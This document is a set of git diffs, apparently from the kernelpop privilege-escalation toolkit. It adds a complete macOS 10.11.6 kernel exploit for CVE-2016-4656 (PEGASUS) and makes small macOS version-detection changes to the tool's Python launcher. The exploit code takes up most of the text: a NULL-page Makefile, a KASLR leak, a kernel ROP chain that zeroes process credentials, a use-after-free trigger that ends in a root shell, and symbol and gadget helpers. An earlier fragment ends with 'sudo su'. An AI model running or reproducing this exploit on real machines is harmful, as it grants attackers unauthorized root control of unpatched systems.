+	sys.stderr.write(".")
+	time.sleep(1)
+
+sys.stderr.write("\ndone\n")
+
+os.system("sudo su")

--- a/exploits/mac/source/CVE20164656/Makefile
+++ b/exploits/mac/source/CVE20164656/Makefile
@@ -1,0 +1,24 @@
+TARGET = exp
+
+all: $(TARGET)
+
+CFLAGS = ""
+FRAMEWORKS = -framework IOKit -framework Foundation -framework CoreFoundation
+
+# Note that in addition to the standard flags we also need
+#
+#	-m32 -Wl,-pagezero_size,0
+#
+# We need these flags because we are leveraging the use-after-free to generate
+# a kernel NULL-pointer dereference. By mapping the NULL page in user space we
+# ensure that when the kernel dereferences the NULL pointer it gets a value
+# that we control. OS X does not allow 64-bit processes to map the NULL page;
+# however, for legacy support, 32-bit processes can map the NULL page. In order
+# to do so we generate a Mach-O executable without an initial __PAGEZERO
+# segment protecting NULL. The "-m32" flag compiles the executable as 32-bit,
+# while the "-Wl,-pagezero_size,0" flag causes the linker to not insert a
+# __PAGEZERO segment in the final Mach-O executable.
+$(TARGET): exp.m lsym.m
+	clang $(CFLAGS) $(FRAMEWORKS) -m32 -Wl,-pagezero_size,0 -O3 $^ -o $@
+clean:
+	rm -f -- $(TARGET)

--- a/exploits/mac/source/CVE20164656/exp.m
+++ b/exploits/mac/source/CVE20164656/exp.m
@@ -1,0 +1,260 @@
+/* ******************************************************************************************
+ 
+ * Local privilege escalation for OS X 10.11.6 via PEGASUS
+
+ * by Min(Spark) Zheng @ Team OverSky (twitter@SparkZheng)
+
+ * Note: 1. If you want to test this exp, you should not install Security Update 2016-001 
+            (like iOS 9.3.5 patch for PEGASUS). 
+         2. I hardcoded a kernel address to calculate the kslide, it may be different on your mac.
+
+ * Special Thanks to proteas, qwertyoruiop, windknown, aimin pan, jingle, liangchen, qoobee, etc.
+ 
+ * Reference: 1. http://blog.pangu.io/cve-2016-4655/
+              2. https://sektioneins.de/en/blog/16-09-02-pegasus-ios-kernel-vulnerability-explained.html
+              3. https://bazad.github.io/2016/05/mac-os-x-use-after-free/
+              4. https://github.com/kpwn/tpwn
+ 
+  ***************************************************************************************** */
+
+#include <unistd.h>
+#include <stdlib.h>
+#include <stdio.h>
+#include <mach/mach.h>
+#include <IOKit/IOKitLib.h>
+#include <IOKit/iokitmig.h>
+
+#import "import.h"
+#import "lsym_gadgets.h"
+
+static uint64_t kslide=0;
+
+#define kOSSerializeBinarySignature "\323\0\0"
+
+enum
+{
+    kOSSerializeDictionary   = 0x01000000U,
+    kOSSerializeArray        = 0x02000000U,
+    kOSSerializeSet          = 0x03000000U,
+    kOSSerializeNumber       = 0x04000000U,
+    kOSSerializeSymbol       = 0x08000000U,
+    kOSSerializeString       = 0x09000000U,
+    kOSSerializeData         = 0x0a000000U,
+    kOSSerializeBoolean      = 0x0b000000U,
+    kOSSerializeObject       = 0x0c000000U,
+    kOSSerializeTypeMask     = 0x7F000000U,
+    kOSSerializeDataMask     = 0x00FFFFFFU,
+};
+
+__attribute__((always_inline)) inline
+lsym_slidden_kern_pointer_t lsym_slide_pointer(lsym_kern_pointer_t pointer) {
+    if (!pointer) return pointer;
+    return (lsym_slidden_kern_pointer_t) pointer + kslide;
+}
+
+__attribute__((always_inline)) static inline
+uint64_t alloc(uint32_t addr, uint32_t sz) {
+    vm_deallocate(mach_task_self(), (vm_address_t) addr, sz);
+    vm_allocate(mach_task_self(), (vm_address_t*)&addr, sz, 0);
+    while(sz--) *(char*)(addr+sz)=0;
+    return addr;
+}
+
+
+int buildropchain()
+{
+
+  printf("building the rop chain...\n");
+    
+  //ropchain code from tpwn (https://github.com/kpwn/tpwn) and rootsh (https://github.com/bazad/rootsh)
+
+  lsym_map_t* mapping_kernel=lsym_map_file("/System/Library/Kernels/kernel");
+
+  kernel_fake_stack_t* stack = calloc(1,sizeof(kernel_fake_stack_t));
+    
+  PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_current_proc");
+  PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack, mapping_kernel);
+  PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_proc_ucred");
+  PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack, mapping_kernel);
+  PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_posix_cred_get");
+  PUSH_GADGET(stack) = ROP_RAX_TO_ARG1(stack, mapping_kernel);
+  PUSH_GADGET(stack) = ROP_ARG2(stack, mapping_kernel, sizeof(int)*3)
+  PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_bzero");
+
+  PUSH_GADGET(stack) = RESOLVE_SYMBOL(mapping_kernel, "_thread_exception_return");
+
+  vm_address_t payload_addr = 0;
+  size_t size = 0x1000;
+  /* In case we are re-executing, deallocate the NULL page. */
+  vm_deallocate(mach_task_self(), payload_addr, size);
+  
+  kern_return_t kr = vm_allocate(mach_task_self(), &payload_addr, size, 0);
+  if (kr != KERN_SUCCESS) {
+    printf("error: could not allocate NULL page for payload\n");
+    return 3;
+  }
+
+  uint64_t * vtable = (uint64_t *)payload_addr;
+
+  /* Virtual method 4 is called in the kernel with rax set to 0. */
+    vtable[0] = 0;
+    vtable[1] = 0;
+    vtable[2] = 0;
+    vtable[3] = ROP_POP_RAX(mapping_kernel);
+    vtable[4] = ROP_PIVOT_RAX(mapping_kernel);
+    vtable[5] = ROP_POP_RAX(mapping_kernel);
+    vtable[6] = 0;
+    vtable[7] = ROP_POP_RSP(mapping_kernel);
+    vtable[8] = (uint64_t)stack->__rop_chain;
+
+    return 0;
+
+}
+
+
+void getkaslr()
+{
+
+  printf("getting kslide...\n");
+
+  kern_return_t err,kr;
+  io_iterator_t iterator;
+  static mach_port_t service = 0;
+  io_connect_t cnn = 0;
+  io_object_t obj=0;
+  io_iterator_t iter;
+   mach_port_t master = 0, res;
+
+    //<dict><key>min</key><number>0x4141414141414141</number></dict>
+    uint32_t data[] = {
+    0x000000d3,                         
+    0x81000001,                         
+    0x08000004, 0x006e696d,
+    0x84000200,    //change the length of OSNumber
+    0x41414141, 0x41414141
+  };
+
+  IOServiceGetMatchingServices(kIOMasterPortDefault, IOServiceMatching("IOHDIXController"), &iterator);
+  service = IOIteratorNext(iterator);
+
+
+  kr = io_service_open_extended(service, mach_task_self(), 0, NDR_record, (char*)data, sizeof(data), &err, &cnn);
+
+  if (kr!=0)
+  {
+    printf("Cannot create service.\n");
+    return;
+  }
+  
+  IORegistryEntryCreateIterator(service, "IOService", kIORegistryIterateRecursively, &iter);
+  io_object_t object = IOIteratorNext(iter);
+
+  char search_str[100] = {0};
+
+  sprintf(search_str, "pid %d", getpid());
+
+  char buffer[0x200] = {0};
+
+  while (object != 0)
+  {
+            uint32_t size = sizeof(buffer);
+            if (IORegistryEntryGetProperty(object, "IOUserClientCreator", buffer, &size) == 0)
+            {
+                if (strstr(buffer, search_str) != NULL)
+                {
+                    memset(buffer,0, 0x200);
+                    size=0x300;
+                    //bcopy( bytes, buf, len ); in io_registry_entry_get_property_bytes()
+                    //Use crafted OSNumber to leak stack information of the kernel
+                    if (io_registry_entry_get_property_bytes(object, "min", buffer, &size)==0)
+                    {
+                    //cacluate the kslide
+                    kslide = *((unsigned long long*)&buffer[56])-0xFFFFFF80003934BF; //macOS 10.11.6 (15G31) hardcode
+                    printf("kslide=0x%llx\n",kslide);
+                    break;
+                    }
+                }
+            }
+            IOObjectRelease(object);            
+            object = IOIteratorNext(iter);
+  }
+    
+  if (object!=0)
+    IOObjectRelease(object);
+}
+
+void expkernel()
+{
+
+  printf("exploit the kernel...\n");
+
+  char * data = malloc(1024);
+  uint32_t bufpos = 0;
+  mach_port_t master = 0, res;
+  kern_return_t kr;
+  
+  /* create header */
+  memcpy(data, kOSSerializeBinarySignature, sizeof(kOSSerializeBinarySignature));
+  bufpos += sizeof(kOSSerializeBinarySignature);
+
+  //<dict><string>A</string><bool>true</bool><key>B</key><data>vtable data...</data><object>1</object></dict>
+
+  *(uint32_t *)(data+bufpos) = kOSSerializeDictionary | 0x80000000 | 0x10; bufpos += 4; //0
+
+  *(uint32_t *)(data+bufpos) = kOSSerializeString | 0x02; bufpos += 4;   //1 string "A"
+  *(uint32_t *)(data+bufpos) = 0x00000041; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = kOSSerializeBoolean | 0x1; bufpos += 4;   //2 bool  "true"
+
+  *(uint32_t *)(data+bufpos) = kOSSerializeSymbol | 0x2; bufpos += 4;   //3 symbol "B"
+  *(uint32_t *)(data+bufpos) = 0x00000042; bufpos += 4;
+  
+  *(uint32_t *)(data+bufpos) = kOSSerializeData | 0x20; bufpos += 4;   //4  vtable
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+  *(uint32_t *)(data+bufpos) = 0x00000000; bufpos += 4;
+
+  *(uint32_t *)(data+bufpos) = kOSSerializeObject | 0x1; bufpos += 4; //5  Object refer to string "A"
+
+  host_get_io_master(mach_host_self(), &master);
+
+  kr = io_service_get_matching_services_bin(master, data, bufpos, &res); //trigger the UAF vul
+
+  free(data);
+
+}
+
+
+int main(int argc, char * argv[])
+{
+
+  printf("*********************************************************************\n");
+  printf("Local privilege escalation for OS X 10.11.6 via PEGASUS \n");
+  printf("by Min(Spark) Zheng @ Team OverSky (twitter@SparkZheng)\n");
+  printf("*********************************************************************\n");
+
+  getkaslr();
+
+  if (kslide==0)
+    return -1;
+ 
+  sleep(1);
+   
+  if (buildropchain()!=0)
+    return -1;
+  
+  sleep(1);
+
+  expkernel();
+
+  argv[0] = "/bin/sh";
+  execve(argv[0], argv, NULL);
+  printf("error: could not exec shell\n");
+
+  return 0;
+
+}

--- a/exploits/mac/source/CVE20164656/import.h
+++ b/exploits/mac/source/CVE20164656/import.h
@@ -1,0 +1,34 @@
+#ifndef pwn_import_h
+#define pwn_import_h
+
+
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <stdint.h>
+
+#include <mach/mach.h>
+#include <mach/mach_vm.h>
+
+#include <IOKit/IOKitLib.h>
+#include <CoreFoundation/CoreFoundation.h>
+#include <IOKit/IOKitLib.h>
+#include <dlfcn.h>
+#include  <string.h>
+#include <mach/mach_types.h>
+#include <mach-o/loader.h>
+#include <sys/types.h>
+#include <mach-o/nlist.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <stdint.h>
+#include <sys/mman.h>
+#include <sys/types.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+
+
+#include "lsym.h"
+#include "lsym_gadgets.h"
+
+#endif

--- a/exploits/mac/source/CVE20164656/lsym.h
+++ b/exploits/mac/source/CVE20164656/lsym.h
@@ -1,0 +1,47 @@
+#ifndef __pwn__lsym__
+#define __pwn__lsym__
+
+#include <stdio.h>
+#include "import.h"
+
+#define JUNK_VALUE 0x1337133713371337
+
+
+typedef struct kernel_fake_stack {
+    uint64_t __cnt;
+    uint64_t __padding[0x499];
+    uint64_t __rop_chain[0x500];
+} kernel_fake_stack_t;
+
+#define LSYM_PAYLOAD_VTABLE 1
+
+struct segment_command_64 *find_segment_64(struct mach_header_64 *mh, const char *segname);
+struct section_64 *find_section_64(struct segment_command_64 *seg, const char *name);
+struct load_command *find_load_command(struct mach_header_64 *mh, uint32_t cmd);
+
+typedef struct lsym_map {
+    void* map;
+    const char* path;
+    size_t sz;
+} lsym_map_t;
+
+typedef enum {
+    LSYM_DO_NOT_REBASE = (1 << 0)
+} lsym_gadget_flags;
+
+typedef uint64_t lsym_map_pointer_t;
+typedef uint64_t lsym_kern_pointer_t;
+typedef uint64_t lsym_slidden_kern_pointer_t;
+typedef uint64_t lsym_offset_t;
+
+lsym_kern_pointer_t         kext_pointer(const char* identifier);
+lsym_map_t                 *lsym_map_file(const char *path);
+lsym_kern_pointer_t         lsym_find_symbol(lsym_map_t *mapping, const char *name);
+lsym_kern_pointer_t         lsym_find_gadget(lsym_map_t *mapping, const char *bytes, const uint32_t size, const lsym_gadget_flags flags);
+lsym_kern_pointer_t         lsym_kernel_base(lsym_map_t *mapping);
+lsym_slidden_kern_pointer_t lsym_slide_pointer(lsym_kern_pointer_t pointer);
+lsym_offset_t               lsym_vm_addrperm();
+
+typedef struct kernel_exploit_vector kernel_exploit_vector_t;
+
+#endif /* defined(__pwn__lsym__) */

--- a/exploits/mac/source/CVE20164656/lsym.m
+++ b/exploits/mac/source/CVE20164656/lsym.m
@@ -1,0 +1,159 @@
+#include "lsym.h"
+#import <Foundation/Foundation.h>
+
+#include <IOKit/IOKitLib.h>
+
+struct segment_command_64 *find_segment_64(struct mach_header_64 *mh, const char *segname);
+struct section_64 *find_section_64(struct segment_command_64 *seg, const char *name);
+struct load_command *find_load_command(struct mach_header_64 *mh, uint32_t cmd);
+extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
+
+
+extern CFDictionaryRef OSKextCopyLoadedKextInfo(CFArrayRef, CFArrayRef);
+#ifdef FIND_KERNEL_SLIDE
+static lsym_offset_t kaslr_slide=0;
+static char kaslr_slide_found   =0;
+#endif
+
+__attribute__((always_inline))
+lsym_kern_pointer_t kext_pointer(const char* identifier){
+    return (lsym_kern_pointer_t)[((NSNumber*)(((__bridge NSDictionary*)OSKextCopyLoadedKextInfo(NULL, NULL))[[NSString stringWithUTF8String:identifier]][@"OSBundleLoadAddress"])) unsignedLongLongValue];
+}
+
+__attribute__((always_inline))
+lsym_map_t *lsym_map_file(const char *path) {
+    int fd=open(path, O_RDONLY);
+if(fd < 0) return 0;
+    struct stat sb;
+    fstat(fd, &sb);
+    if (sb.st_size < 0x1000) {
+        return 0;
+    }
+    void* map = mmap(NULL, sb.st_size  & 0xFFFFFFFF, PROT_READ, MAP_SHARED, fd, 0);
+    lsym_map_t* ret = (lsym_map_t*)malloc(sizeof(lsym_map_t));
+    ret->map  = map;
+    ret->path = path;
+    ret->sz = sb.st_size & 0xFFFFFFFF;
+    return ret;
+}
+
+__attribute__((always_inline))
+lsym_kern_pointer_t lsym_find_gadget(lsym_map_t *mapping, const char *bytes, const uint32_t size, const lsym_gadget_flags flags) {
+    lsym_offset_t off=(lsym_offset_t)memmem(mapping->map, mapping->sz, bytes, size);
+    if (!off) {
+        puts("[-] Couldn't find a ROP gadget, aborting.");
+        exit(1);
+    }
+    return lsym_slide_pointer(((flags & LSYM_DO_NOT_REBASE) == 0 ? lsym_kernel_base(mapping) : 0)+(off - (lsym_offset_t) mapping->map));
+}
+
+__attribute__((always_inline))
+lsym_kern_pointer_t lsym_kernel_base(lsym_map_t *mapping) {
+    struct mach_header_64 *mh = mapping->map;
+    struct segment_command_64 *text = find_segment_64(mh, SEG_TEXT);
+    return (lsym_kern_pointer_t)text->vmaddr;
+}
+__attribute__((always_inline))
+lsym_kern_pointer_t lsym_find_symbol(lsym_map_t *mapping, const char *name) {
+    struct mach_header_64 *mh = mapping->map;
+    struct symtab_command *symtab = NULL;
+    struct segment_command_64 *linkedit = NULL;    
+    /*
+     * Check header
+     */
+    if (mh->magic != MH_MAGIC_64) {
+        return (lsym_kern_pointer_t)NULL;
+    }
+    
+    /*
+     * Find the LINKEDIT and SYMTAB sections
+     */
+    linkedit = find_segment_64(mh, SEG_LINKEDIT);
+    if (!linkedit) {
+        return (lsym_kern_pointer_t)NULL;
+    }
+    
+    symtab = (struct symtab_command *)find_load_command(mh, LC_SYMTAB);
+    if (!symtab) {
+        return (lsym_kern_pointer_t)NULL;
+    }
+    void* symtabp = symtab->stroff + 4 + (char*)mh;
+    void* symtabz = symtab->stroff + (char*)mh;
+    void* symendp = symtab->stroff + (char*)mh + symtab->strsize - 0xA;
+    uint32_t idx = 0;
+    while (symtabp < symendp) {
+        if(strcmp(symtabp, name) == 0) goto found;
+        symtabp += strlen((char*)symtabp) + 1;
+        idx++;
+    }
+    printf("[-] symbol %s not resolved.\n", name); exit(0);
+    return (lsym_kern_pointer_t)NULL;
+found:;
+    struct nlist_64* nlp = (struct nlist_64*) (((uint32_t)(symtab->symoff)) + (char*)mh);
+    uint64_t strx = ((char*)symtabp - (char*)symtabz);
+    unsigned int symp = 0;
+    while(symp <= (symtab->nsyms)) {
+        uint32_t strix = *((uint32_t*)nlp);
+        if(strix == strx)
+            goto found1;
+        nlp ++; //sizeof(struct nlist_64);
+        symp++;
+    }
+    printf("[-] symbol not found: %s\n", name);
+    exit(-1);
+found1:
+    //printf("[+] found symbol %s at 0x%016llx\n", name, nlp->n_value);
+    return (lsym_kern_pointer_t)nlp->n_value;
+
+}
+
+__attribute__((always_inline))
+struct segment_command_64 *find_segment_64(struct mach_header_64 *mh, const char *segname)
+{
+    struct load_command *lc;
+    struct segment_command_64 *s, *fs = NULL;
+    lc = (struct load_command *)((uint64_t)mh + sizeof(struct mach_header_64));
+    while ((uint64_t)lc < (uint64_t)mh + (uint64_t)mh->sizeofcmds) {
+        if (lc->cmd == LC_SEGMENT_64) {
+            s = (struct segment_command_64 *)lc;
+            if (!strcmp(s->segname, segname)) {
+                fs = s;
+                break;
+            }
+        }
+        lc = (struct load_command *)((uint64_t)lc + (uint64_t)lc->cmdsize);
+    }
+    return fs;
+}
+
+__attribute__((always_inline))
+struct section_64 *find_section_64(struct segment_command_64 *seg, const char *name)
+{
+    struct section_64 *sect, *fs = NULL;
+    uint32_t i = 0;
+    for (i = 0, sect = (struct section_64 *)((uint64_t)seg + (uint64_t)sizeof(struct segment_command_64));
+         i < seg->nsects;
+         i++, sect = (struct section_64 *)((uint64_t)sect + sizeof(struct section_64)))
+    {
+        if (!strcmp(sect->sectname, name)) {
+            fs = sect;
+            break;
+        }
+    }
+    return fs;
+}
+
+__attribute__((always_inline))
+struct load_command *find_load_command(struct mach_header_64 *mh, uint32_t cmd)
+{
+    struct load_command *lc, *flc;
+    lc = (struct load_command *)((uint64_t)mh + sizeof(struct mach_header_64));
+    while ((uint64_t)lc < (uint64_t)mh + (uint64_t)mh->sizeofcmds) {
+        if (lc->cmd == cmd) {
+            flc = (struct load_command *)lc;
+            break;
+        }
+        lc = (struct load_command *)((uint64_t)lc + (uint64_t)lc->cmdsize);
+    }
+    return flc;
+}

--- a/exploits/mac/source/CVE20164656/lsym_gadgets.h
+++ b/exploits/mac/source/CVE20164656/lsym_gadgets.h
@@ -1,0 +1,69 @@
+#ifndef ROP_PIVOT_RAX
+/* Short verion of lsym_slide_pointer(lsym_find_symbol()) */
+
+#define RESOLVE_SYMBOL(map, name) lsym_slide_pointer(lsym_find_symbol(map, name))
+
+/* ROP gadgets present in 10.10 */
+
+// stack pivot
+#define ROP_PIVOT_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x50, 0x01, 0x00, 0x00, 0x5b, 0x41, 0x5c, 0x41, 0x5e, 0x41, 0x5F, 0x5D, 0xC3}), 13, 0)
+#define ROP_POP_R14_R15_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x41, 0x5e, 0x41, 0x5F, 0x5D, 0xC3}), 6, 0)
+#define ROP_R14_TO_RCX_CALL_pRAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x4C,0x89,0xF1,0xFF,0x10}), 5, 0)
+#define ROP_R14_TO_RDI_CALL_pRAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x4C,0x89,0xF7,0xFF,0x10}), 5, 0)
+
+#define ROP_AND_RCX_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x21,0xc8,0x5d,0xC3}), 5 , 0)
+#define ROP_OR_RCX_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x09,0xc8,0x5d,0xC3}), 5 , 0)
+#define ROP_RCX_TO_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0xBA, 0x48, 0x89, 0xC1, 0x48, 0x89, 0xC8, 0x5D, 0xC3}), 9 , 0)
+
+// advanced register control (experimental) - many of these gadget do not require stack pivoting, but allow for register control and register based flow control (which lets us back up registers that our pivot corrupts).
+// how the fuck do these gadgets even exist lmao
+
+#define ROP_RAX_TO_RDI_POP_RBP_JMP_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC7, 0x5D, 0xFF, 0xE1}), 6, 0);
+#define ROP_RAX_TO_RSI_POP_RBP_JMP_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC6, 0x5D, 0xFF, 0xE1}), 6, 0);
+#define ROP_RBX_TO_RSI_CALL_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xDE, 0xFF, 0xD1}), 5, 0); // This function does movq rbx, rsi; callq *rcx. so *rcx should point to a pop gadget.
+#define ROP_RAX_TO_RCX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC1, 0x48, 0x89, 0xC8, 0x5D, 0xC3}), 8, 0);
+#define ROP_CR4_TO_RAX_WRITE_RAX_TO_pRCX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x0F, 0x20, 0xE0, 0x48, 0x89, 0x01, 0x5D, 0xC3}), 8 , 0)
+#define ROP_RAX_TO_CR4_WRITE_ESI_TO_60H_RDI_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x0F, 0x22, 0xE0, 0x89, 0x77, 0x60, 0x5D, 0xC3}), 8 , 0)
+#define ROP_PUSH_RBP_8H_RDI_TO_RAX_JMP_0H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x55, 0x48, 0x89, 0xE5, 0x48, 0x8B, 0x47, 0x08, 0x5D, 0xFF, 0x20}), 0xB , 0)
+#define ROP_RAX_TO_RDI_RCX_TO_RSI_CALL_58H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xC7, 0x48, 0x89, 0xCE, 0xFF, 0x50, 0x58}), 9 , 0)
+#define ROP_POP_RBX_RBP_JMP_28H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5B, 0x5D, 0xFF, 0x60, 0x28}), 5 , 0)
+#define ROP_WRITE_RBX_WHAT_R14_WHERE_POP_ _POP_R14_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x49, 0x89, 0x1E, 0x5B, 0x41, 0x5E, 0x5D, 0xC3}), 8 , 0)
+#define ROP_POP_R14_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x41, 0x5E, 0x5D, 0xC3}), 4, 0)
+#define ROP_RBX_TO_RSI_CALL_30H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xDE, 0xFF, 0x50, 0x30}), 6, 0)
+#define ROP_RDI_TO_RBX_CALL_130H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xFB, 0xFF, 0x90, 0x30, 0x01, 0x00, 0x00}), 9, 0)
+#define ROP_RSI_TO_RBX_CALL_178H_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xF3, 0xFF, 0x90, 0x78, 0x01, 0x00, 0x00}), 9, 0)
+#define ROP_RSI_TO_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0x89, 0xF0, 0x5d, 0xC3}), 5, 0)
+#define ROP_INC_48H_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48, 0xff, 0x40, 0x48, 0x5d, 0xC3}), 6, 0)
+// register control
+#define ROP_POP_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x58, 0xC3}), 2 , 0)
+#define ROP_POP_RCX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x59, 0xC3}), 2 , 0)
+#define ROP_POP_RDX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5A, 0xc3}), 2 , 0)
+#define ROP_POP_RBX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5B, 0xc3}), 2 , 0)
+#define ROP_POP_RSP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5C, 0xC3}), 2 , 0)
+#define ROP_POP_RSP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5C, 0x5d, 0xC3}), 3 , 0)
+#define ROP_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5D, 0xc3}), 2 , 0)
+#define ROP_POP_RSI(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5E, 0xc3}), 2 , 0)
+#define ROP_POP_RDI(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x5F, 0xc3}), 2 , 0)
+#define ROP_RSI_TO_RAX(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x55, 0x48, 0x89, 0xE5, 0x48, 0x89, 0xF0, 0x5D, 0xC3}), 9 , 0)
+
+// write gadgets
+#define ROP_WRITE_RDX_WHAT_RCX_WHERE_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x89,0x11,0x5D,0xC3}), 5 , 0)
+#define ROP_WRITE_RAX_WHAT_RDX_WHERE_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x89,0x02,0x5D,0xC3}), 5 , 0)
+
+// read gadget
+#define ROP_READ_RAX_TO_RAX_POP_RBP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x48,0x8B,0x00,0x5D,0xC3}), 5 , 0)
+
+
+// simple nop. 0x90 is added to avoid 0xC3 matching non-executable kernel contents.
+
+#define ROP_NULL_OP(map) lsym_find_gadget(map, (char*)((uint8_t[]){0x90, 0xC3}), 2, 0);
+
+// helpers
+
+#define PUSH_GADGET(stack) stack->__rop_chain[stack->__cnt++]
+#define ROP_ARG1(stack, map, value) ROP_POP_RDI(map); PUSH_GADGET(stack) = value;
+#define ROP_ARG2(stack, map, value) ROP_POP_RSI(map); PUSH_GADGET(stack) = value;
+#define ROP_ARG3(stack, map, value) ROP_POP_RDX(map); PUSH_GADGET(stack) = value;
+#define ROP_ARG4(stack, map, value) ROP_POP_RCX(map); PUSH_GADGET(stack) = value;
+#define ROP_RAX_TO_ARG1(stack, map) ROP_POP_RCX(map); PUSH_GADGET(stack) = ROP_NULL_OP(map); PUSH_GADGET(stack) = ROP_RAX_TO_RDI_POP_RBP_JMP_RCX(map); PUSH_GADGET(stack) = JUNK_VALUE;
+#endif

--- a/kernelpop.py
+++ b/kernelpop.py
@@ -8,13 +8,16 @@ def main():
 	# brute force all discovered exploits
 	elif sys.argv[1] == "-b":
 		kernelpop(mode="brute-enumerate")
-	#elif sys.argv[1] == "-be":									# just asking for uncontrolled crashes..
-	#	kernelpop(mode="brute-exploit")
 	elif sys.argv[1] == "-e" and len(sys.argv) > 2:
 		kernelpop(mode="exploit", exploit=sys.argv[2])
 	elif sys.argv[1] == "-i":
 		uname = input("Please enter uname: ")
-		kernelpop(mode="input", uname=uname)
+		if "darwin" in str(uname).lower():
+			print("[!] macs require additional input")
+			osx_ver = input("[*] Please enter the OSX version. It is found in 2nd line of output of `sw_vers` command: ")
+			kernelpop(mode="input", uname=uname, osx_ver=osx_ver)
+		else:
+			kernelpop(mode="input", uname=uname)
 
 
 if __name__ == "__main__":

--- a/kernelpop.py
+++ b/kernelpop.py
@@ -1,5 +1,6 @@
 import sys
 from src.kernelpop import kernelpop
+from constants import color_print
 
 
 def main():
@@ -13,8 +14,11 @@ def main():
 	elif sys.argv[1] == "-i":
 		uname = input("Please enter uname: ")
 		if "darwin" in str(uname).lower():
-			print("[!] macs require additional input")
-			osx_ver = input("[*] Please enter the OSX version. It is found in 2nd line of output of `sw_vers` command: ")
+			color_print("[!] macs require additional input", color="yellow")
+			osx_ver = input("[*] Please enter the OSX `ProductVersion`. It is found in 2nd line of output of `sw_vers` command: ")
+			if len(str(osx_ver).split(".")) != 3:
+				color_print("[-] OSX version input is not correct (Major.Minor.Release i.e 10.9.5)", color="red")
+				exit(1)
 			kernelpop(mode="input", uname=uname, osx_ver=osx_ver)
 		else:
 			kernelpop(mode="input", uname=uname)

--- a/src/kernelpop.py
+++ b/src/kernelpop.py
@@ -6,7 +6,7 @@ from constants import LINUX_EXPLOIT_PATH, HIGH_RELIABILITY, MEDIUM_RELIABILITY, 
 	color_print, UBUNTU_12, UBUNTU_12_LTS, UBUNTU_14, UBUNTU_14_LTS, UBUNTU_16, UBUNTU_16_LTS, UBUNTU_GENERIC, \
 	GENERIC_LINUX, CONFIRMED_VULNERABLE, POTENTIALLY_VULNERABLE, NOT_VULNERABLE, UBUNTU_7, UBUNTU_7_LTS, UBUNTU_8, \
 	UBUNTU_8_LTS, UBUNTU_9, UBUNTU_9_LTS, UBUNTU_17, UBUNTU_17_LTS, DEBIAN_GENERIC, UBUNTU_15, UBUNTU_15_LTS, \
-	UBUNTU_6, ARCHITECTURE_GENERIC
+	UBUNTU_6, ARCHITECTURE_GENERIC, shell_results
 
 
 class Kernel:
@@ -112,6 +112,19 @@ class Kernel:
 				return GENERIC_LINUX
 
 		return "unknown"
+
+	def get_mac_version(self):
+		"""
+		Gets the mac operating system version vs. the kernel version
+		:return:
+		"""
+		v_command = "sw_vers"
+		mac_v = shell_results(v_command)
+		v_major = int(mac_v.split("\n")[1].split(".")[0])
+		v_minor = int(mac_v.split("\n")[1].split(".")[1])
+		v_release = int(mac_v.split("\n")[1].split(".")[2])
+
+		return v_major, v_minor, v_release
 
 	def process_kernel_version(self, kernel_version, uname=False):
 		# running on mac

